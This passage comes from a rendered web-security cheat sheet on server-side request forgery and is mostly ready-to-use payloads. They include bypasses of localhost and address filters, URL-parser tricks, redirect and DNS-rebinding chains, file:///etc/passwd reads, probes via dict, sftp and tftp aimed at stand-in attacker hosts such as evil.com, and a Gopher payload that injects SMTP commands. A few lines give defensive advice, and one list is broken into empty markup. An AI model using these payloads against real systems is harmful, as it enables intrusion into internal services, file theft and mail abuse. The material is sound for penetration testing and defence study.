<h3 id="bypass-using-malformed-urls">Bypass using malformed urls</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">localhost</span><span class="p">:+</span><span class="n">11211aaa</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="n">localhost</span><span class="p">:</span><span class="n">00011211aaaa</span>
</code></pre></div>
<h3 id="bypass-using-rare-address">Bypass using rare address</h3>
<p>You can shorten IP addresses by dropping the zeros.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="n">http</span><span class="p">://</span><span class="n">0</span><span class="p">/</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
</code></pre></div>
<h3 id="bypass-using-url-encoding">Bypass using URL encoding</h3>
<p><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter">Single or double encode a specific URL to bypass blacklist</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span><span class="k">%</span><span class="n">61dmin</span>
<a id="__codelineno-13-2" name="__codelineno-13-2" href="#__codelineno-13-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">/</span><span class="k">%</span><span class="n">2561dmin</span>
</code></pre></div>
<h3 id="bypass-using-bash-variables">Bypass using bash variables</h3>
<p>(curl only)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="nb">curl </span><span class="n">-v</span> <span class="s2">&quot;http://evil$google.com&quot;</span>
<a id="__codelineno-14-2" name="__codelineno-14-2" href="#__codelineno-14-2"></a><span class="nv">$google</span> <span class="p">=</span> <span class="s2">&quot;&quot;</span>
</code></pre></div>
<h3 id="bypass-using-tricks-combination">Bypass using tricks combination</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="n">http</span><span class="p">://</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span> <span class="p">&amp;</span><span class="nv">@2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="c"># @3.3.3.3/</span>
<a id="__codelineno-15-2" name="__codelineno-15-2" href="#__codelineno-15-2"></a><span class="n">urllib2</span> <span class="p">:</span> <span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-15-3" name="__codelineno-15-3" href="#__codelineno-15-3"></a><span class="n">requests</span> <span class="p">+</span> <span class="n">browsers</span> <span class="p">:</span> <span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span>
<a id="__codelineno-15-4" name="__codelineno-15-4" href="#__codelineno-15-4"></a><span class="n">urllib</span> <span class="p">:</span> <span class="n">3</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">3</span>
</code></pre></div>
<h3 id="bypass-using-enclosed-alphanumerics">Bypass using enclosed alphanumerics</h3>
<p><a href="https://twitter.com/EdOverflow">@EdOverflow</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="n">http</span><span class="p">://</span><span class="err">ⓔⓧⓐⓜⓟⓛⓔ</span><span class="p">.</span><span class="err">ⓒⓞⓜ</span> <span class="p">=</span> <span class="n">example</span><span class="p">.</span><span class="n">com</span>
<a id="__codelineno-16-2" name="__codelineno-16-2" href="#__codelineno-16-2"></a>
<a id="__codelineno-16-3" name="__codelineno-16-3" href="#__codelineno-16-3"></a><span class="n">List</span><span class="p">:</span>
<a id="__codelineno-16-4" name="__codelineno-16-4" href="#__codelineno-16-4"></a><span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span 
class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="err"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span> <span 
class="n"></span> <span class="n"></span> <span class="n"></span> <span class="n"></span>
</code></pre></div>
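<h3 id="bypass-using-unicode">Bypass using Unicode</h3>
<p>In some languages (.NET, Python 3), regular expressions are Unicode-aware by default:
<code>\d</code> matches <code>0123456789</code> but also digits from other scripts such as <code>๐๑๒๓๔๕๖๗๘๙</code>. A validator that must accept ASCII digits only should use <code>[0-9]</code> or an ASCII-only mode (<code>re.ASCII</code> in Python, <code>RegexOptions.ECMAScript</code> in .NET).</p>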
<h3 id="bypass-filter_var-php-function">Bypass filter_var() php function</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="n">0</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">80</span><span class="p">;</span><span class="n">http</span><span class="p">://</span><span class="n">google</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
</code></pre></div>
<h3 id="bypass-against-a-weak-parser">Bypass against a weak parser</h3>
<p>by Orange Tsai (<a href="https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf">Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf</a>)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-18-1" name="__codelineno-18-1" href="#__codelineno-18-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">\</span><span class="nv">@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-18-2" name="__codelineno-18-2" href="#__codelineno-18-2"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">\</span><span class="nv">@@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-18-3" name="__codelineno-18-3" href="#__codelineno-18-3"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="p">:\</span><span class="nv">@@127</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">2</span><span class="p">:</span><span class="n">80</span><span class="p">/</span>
<a id="__codelineno-18-4" name="__codelineno-18-4" href="#__codelineno-18-4"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span><span class="c">#\@127.2.2.2:80/</span>
</code></pre></div>
<p><img alt="Weak parser illustration" src="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true"></p>
<h3 id="bypassing-using-a-redirect">Bypassing using a redirect</h3>
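<p><a href="https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection">Using a redirect</a>: a filter that validates only the initial URL does not see the redirect target, so each hop has to be validated again, or redirects not followed at all.</p>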
<div class="highlight"><pre><span></span><code><a id="__codelineno-19-1" name="__codelineno-19-1" href="#__codelineno-19-1"></a><span class="n">1</span><span class="p">.</span> <span class="n">Create</span> <span class="n">a</span> <span class="n">page</span> <span class="n">on</span> <span class="n">a</span> <span class="n">whitelisted</span> <span class="n">host</span> <span class="n">that</span> <span class="n">redirects</span> <span class="n">requests</span> <span class="n">to</span> <span class="n">the</span> <span class="n">SSRF</span> <span class="n">the</span> <span class="n">target</span> <span class="n">URL</span> <span class="p">(</span><span class="n">e</span><span class="p">.</span><span class="n">g</span><span class="p">.</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">)</span>
<a id="__codelineno-19-2" name="__codelineno-19-2" href="#__codelineno-19-2"></a><span class="n">2</span><span class="p">.</span> <span class="n">Launch</span> <span class="n">the</span> <span class="n">SSRF</span> <span class="n">pointing</span> <span class="n">to</span> <span class="n">vulnerable</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">index</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">YOUR_SERVER_IP</span>
<a id="__codelineno-19-3" name="__codelineno-19-3" href="#__codelineno-19-3"></a><span class="n">vulnerable</span><span class="p">.</span><span class="n">com</span> <span class="n">will</span> <span class="n">fetch</span> <span class="n">YOUR_SERVER_IP</span> <span class="n">which</span> <span class="n">will</span> <span class="n">redirect</span> <span class="n">to</span> <span class="n">192</span><span class="p">.</span><span class="n">168</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span>
<a id="__codelineno-19-4" name="__codelineno-19-4" href="#__codelineno-19-4"></a><span class="n">3</span><span class="p">.</span> <span class="n">You</span> <span class="n">can</span> <span class="n">use</span> <span class="n">response</span> <span class="n">codes</span> <span class="p">[</span><span class="n">307</span><span class="p">](</span><span class="n">https</span><span class="p">://</span><span class="n">developer</span><span class="p">.</span><span class="n">mozilla</span><span class="p">.</span><span class="n">org</span><span class="p">/</span><span class="n">en-US</span><span class="p">/</span><span class="n">docs</span><span class="p">/</span><span class="n">Web</span><span class="p">/</span><span class="n">HTTP</span><span class="p">/</span><span class="n">Status</span><span class="p">/</span><span class="n">307</span><span class="p">)</span> <span class="n">and</span> <span class="p">[</span><span class="n">308</span><span class="p">](</span><span class="n">https</span><span class="p">://</span><span class="n">developer</span><span class="p">.</span><span class="n">mozilla</span><span class="p">.</span><span class="n">org</span><span class="p">/</span><span class="n">en-US</span><span class="p">/</span><span class="n">docs</span><span class="p">/</span><span class="n">Web</span><span class="p">/</span><span class="n">HTTP</span><span class="p">/</span><span class="n">Status</span><span class="p">/</span><span class="n">308</span><span class="p">)</span> <span class="k">in</span> <span class="n">order</span> <span class="n">to</span> <span class="n">retain</span> <span class="n">HTTP</span> <span class="n">method</span> <span class="n">and</span> <span class="n">body</span> <span class="n">after</span> <span class="n">the</span> <span class="n">redirection</span><span class="p">.</span>
</code></pre></div>
<h3 id="bypassing-using-typeurl">Bypassing using type=url</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-20-1" name="__codelineno-20-1" href="#__codelineno-20-1"></a><span class="n">Change</span> <span class="s2">&quot;type=file&quot;</span> <span class="n">to</span> <span class="s2">&quot;type=url&quot;</span>
<a id="__codelineno-20-2" name="__codelineno-20-2" href="#__codelineno-20-2"></a><span class="n">Paste</span> <span class="n">URL</span> <span class="k">in</span> <span class="n">text</span> <span class="n">field</span> <span class="n">and</span> <span class="n">hit</span> <span class="n">enter</span>
<a id="__codelineno-20-3" name="__codelineno-20-3" href="#__codelineno-20-3"></a><span class="n">Using</span> <span class="n">this</span> <span class="n">vulnerability</span> <span class="n">users</span> <span class="n">can</span> <span class="n">upload</span> <span class="n">images</span> <span class="n">from</span> <span class="n">any</span> <span class="n">image</span> <span class="n">URL</span> <span class="p">=</span> <span class="n">trigger</span> <span class="n">an</span> <span class="n">SSRF</span>
</code></pre></div>
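<h3 id="bypassing-using-dns-rebinding-toctou">Bypassing using DNS Rebinding (TOCTOU)</h3>
<p>The filter resolves the name and checks the address, then the HTTP client resolves the name again and may receive a different address. Resolving once and connecting to the address that was checked removes the gap between check and use.</p>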
<div class="highlight"><pre><span></span><code><a id="__codelineno-21-1" name="__codelineno-21-1" href="#__codelineno-21-1"></a><span class="n">Create</span> <span class="n">a</span> <span class="n">domain</span> <span class="n">that</span> <span class="n">change</span> <span class="n">between</span> <span class="n">two</span> <span class="n">IPs</span><span class="p">.</span> <span class="n">http</span><span class="p">://</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span><span class="p">/</span> <span class="n">exists</span> <span class="k">for</span> <span class="n">this</span> <span class="n">purpose</span><span class="p">.</span>
<a id="__codelineno-21-2" name="__codelineno-21-2" href="#__codelineno-21-2"></a><span class="k">For</span> <span class="n">example</span> <span class="n">to</span> <span class="n">rotate</span> <span class="n">between</span> <span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4</span> <span class="n">and</span> <span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">,</span> <span class="n">use</span> <span class="n">the</span> <span class="n">following</span> <span class="n">domain</span><span class="p">:</span>
<a id="__codelineno-21-3" name="__codelineno-21-3" href="#__codelineno-21-3"></a><span class="n">make</span><span class="p">-</span><span class="n">1</span><span class="p">.</span><span class="n">2</span><span class="p">.</span><span class="n">3</span><span class="p">.</span><span class="n">4-rebind</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254-rr</span><span class="p">.</span><span class="n">1u</span><span class="p">.</span><span class="n">ms</span>
</code></pre></div>
<h3 id="bypassing-using-jar-protocol-java-only">Bypassing using jar protocol (java only)</h3>
<p>Blind SSRF: the request is sent by the server, but its response is not returned to the requester.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-22-1" name="__codelineno-22-1" href="#__codelineno-22-1"></a><span class="n">jar</span><span class="p">:</span><span class="n">scheme</span><span class="p">://</span><span class="n">domain</span><span class="p">/</span><span class="n">path</span><span class="p">!/</span>
<a id="__codelineno-22-2" name="__codelineno-22-2" href="#__codelineno-22-2"></a><span class="n">jar</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
<a id="__codelineno-22-3" name="__codelineno-22-3" href="#__codelineno-22-3"></a><span class="n">jar</span><span class="p">:</span><span class="n">https</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
<a id="__codelineno-22-4" name="__codelineno-22-4" href="#__codelineno-22-4"></a><span class="n">jar</span><span class="p">:</span><span class="n">ftp</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">!/</span>
</code></pre></div>
<h2 id="ssrf-exploitation-via-url-scheme">SSRF exploitation via URL Scheme</h2>
<h3 id="file">File</h3>
<p>Allows an attacker to fetch the content of a file on the server</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-23-1" name="__codelineno-23-1" href="#__codelineno-23-1"></a><span class="n">file</span><span class="p">://</span><span class="n">path</span><span class="p">/</span><span class="n">to</span><span class="p">/</span><span class="n">file</span>
<a id="__codelineno-23-2" name="__codelineno-23-2" href="#__codelineno-23-2"></a><span class="n">file</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-23-3" name="__codelineno-23-3" href="#__codelineno-23-3"></a><span class="n">file</span><span class="p">://\/\/</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
<a id="__codelineno-23-4" name="__codelineno-23-4" href="#__codelineno-23-4"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">file</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
</code></pre></div>
<h3 id="http">HTTP</h3>
<p>Allows an attacker to fetch any content from the web. It can also be used to scan ports on hosts the server can reach.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-24-1" name="__codelineno-24-1" href="#__codelineno-24-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">22</span>
<a id="__codelineno-24-2" name="__codelineno-24-2" href="#__codelineno-24-2"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">80</span>
<a id="__codelineno-24-3" name="__codelineno-24-3" href="#__codelineno-24-3"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">443</span>
</code></pre></div>
<p><img alt="SSRF stream" src="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true" /></p>
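<p>The following URL schemes can be used to probe the network. Each one only works when the library performing the fetch supports it, so a server-side allow-list of <code>http</code> and <code>https</code> removes them.</p>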
<h3 id="dict">Dict</h3>
<p>The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-25-1" name="__codelineno-25-1" href="#__codelineno-25-1"></a><span class="n">dict</span><span class="p">://&lt;</span><span class="n">user</span><span class="p">&gt;;&lt;</span><span class="n">auth</span><span class="p">&gt;@&lt;</span><span class="n">host</span><span class="p">&gt;:&lt;</span><span class="n">port</span><span class="p">&gt;/</span><span class="n">d</span><span class="p">:&lt;</span><span class="n">word</span><span class="p">&gt;:&lt;</span><span class="n">database</span><span class="p">&gt;:&lt;</span><span class="n">n</span><span class="p">&gt;</span>
<a id="__codelineno-25-2" name="__codelineno-25-2" href="#__codelineno-25-2"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">attacker</span><span class="p">:</span><span class="n">11111</span><span class="p">/</span>
</code></pre></div>
<h3 id="sftp">SFTP</h3>
<p>A network protocol used for secure file transfer over secure shell</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-26-1" name="__codelineno-26-1" href="#__codelineno-26-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">sftp</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">11111</span><span class="p">/</span>
</code></pre></div>
<h3 id="tftp">TFTP</h3>
<p>Trivial File Transfer Protocol, works over UDP</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-27-1" name="__codelineno-27-1" href="#__codelineno-27-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">tftp</span><span class="p">://</span><span class="n">evil</span><span class="p">.</span><span class="n">com</span><span class="p">:</span><span class="n">12346</span><span class="p">/</span><span class="n">TESTUDPPACKET</span>
</code></pre></div>
<h3 id="ldap">LDAP</h3>
<p>Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-28-1" name="__codelineno-28-1" href="#__codelineno-28-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">ldap</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">11211</span><span class="p">/</span><span class="k">%</span><span class="n">0astats</span><span class="k">%</span><span class="n">0aquit</span>
</code></pre></div>
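<h3 id="gopher">Gopher</h3>
<p>Gopher sends the URL path as raw bytes to the chosen TCP port, so URL-encoded line breaks turn into commands for a line-based service (SMTP on port 25 in the example below, where <code>%250d%250a</code> is a double-encoded CR LF). A <code>gopher://</code> scheme or encoded CR/LF sequences inside a URL parameter are worth alerting on, and the scheme should be disabled in the fetching library when it is not needed.</p>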
<div class="highlight"><pre><span></span><code><a id="__codelineno-29-1" name="__codelineno-29-1" href="#__codelineno-29-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">25</span><span class="p">/</span><span class="n">xHELO</span><span class="k">%</span><span class="n">20localhost</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aMAIL</span><span class="k">%</span><span class="n">20FROM</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">3Chacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aRCPT</span><span class="k">%</span><span class="n">20TO</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">3Cvictim</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aDATA</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aFrom</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">5BHacker</span><span class="k">%</span><span class="n">5D</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">3Chacker</span><span class="nv">@site</span><span 
class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aTo</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">3Cvictime</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aDate</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20Tue</span><span class="k">%</span><span class="n">2C</span><span class="k">%</span><span class="n">2015</span><span class="k">%</span><span class="n">20Sep</span><span class="k">%</span><span class="n">202017</span><span class="k">%</span><span class="n">2017</span><span class="k">%</span><span class="n">3A20</span><span class="k">%</span><span class="n">3A26</span><span class="k">%</span><span class="n">20</span><span class="p">-</span><span class="n">0400</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aSubject</span><span class="k">%</span><span class="n">3A</span><span class="k">%</span><span class="n">20AH</span><span class="k">%</span><span class="n">20AH</span><span class="k">%</span><span class="n">20AH</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aYou</span><span class="k">%</span><span class="n">20didn</span><span class="k">%</span><span class="n">27t</span><span class="k">%</span><span class="n">20say</span><span class="k">%</span><span class="n">20the</span><span class="k">%</span><span class="n">20magic</span><span class="k">%</span><span class="n">20word</span><span 
class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">21</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span><span class="p">.</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250aQUIT</span><span class="k">%</span><span class="n">250d</span><span class="k">%</span><span class="n">250a</span>
<a id="__codelineno-29-2" name="__codelineno-29-2" href="#__codelineno-29-2"></a>
<a id="__codelineno-29-3" name="__codelineno-29-3" href="#__codelineno-29-3"></a><span class="n">will</span> <span class="n">make</span> <span class="n">a</span> <span class="n">request</span> <span class="n">like</span>
<a id="__codelineno-29-4" name="__codelineno-29-4" href="#__codelineno-29-4"></a><span class="n">HELO</span> <span class="n">localhost</span>
<a id="__codelineno-29-5" name="__codelineno-29-5" href="#__codelineno-29-5"></a><span class="n">MAIL</span> <span class="n">FROM</span><span class="p">:&lt;</span><span class="n">hacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-6" name="__codelineno-29-6" href="#__codelineno-29-6"></a><span class="n">RCPT</span> <span class="n">TO</span><span class="p">:&lt;</span><span class="n">victim</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-7" name="__codelineno-29-7" href="#__codelineno-29-7"></a><span class="n">DATA</span>
<a id="__codelineno-29-8" name="__codelineno-29-8" href="#__codelineno-29-8"></a><span class="n">From</span><span class="p">:</span> <span class="no">[Hacker]</span> <span class="p">&lt;</span><span class="n">hacker</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-9" name="__codelineno-29-9" href="#__codelineno-29-9"></a><span class="n">To</span><span class="p">:</span> <span class="p">&lt;</span><span class="n">victime</span><span class="nv">@site</span><span class="p">.</span><span class="n">com</span><span class="p">&gt;</span>
<a id="__codelineno-29-10" name="__codelineno-29-10" href="#__codelineno-29-10"></a><span class="n">Date</span><span class="p">:</span> <span class="n">Tue</span><span class="p">,</span> <span class="n">15</span> <span class="n">Sep</span> <span class="n">2017</span> <span class="n">17</span><span class="p">:</span><span class="n">20</span><span class="p">:</span><span class="n">26</span> <span class="p">-</span><span class="n">0400</span>
<a id="__codelineno-29-11" name="__codelineno-29-11" href="#__codelineno-29-11"></a><span class="n">Subject</span><span class="p">:</span> <span class="n">AH</span> <span class="n">AH</span> <span class="n">AH</span>
<a id="__codelineno-29-12" name="__codelineno-29-12" href="#__codelineno-29-12"></a>
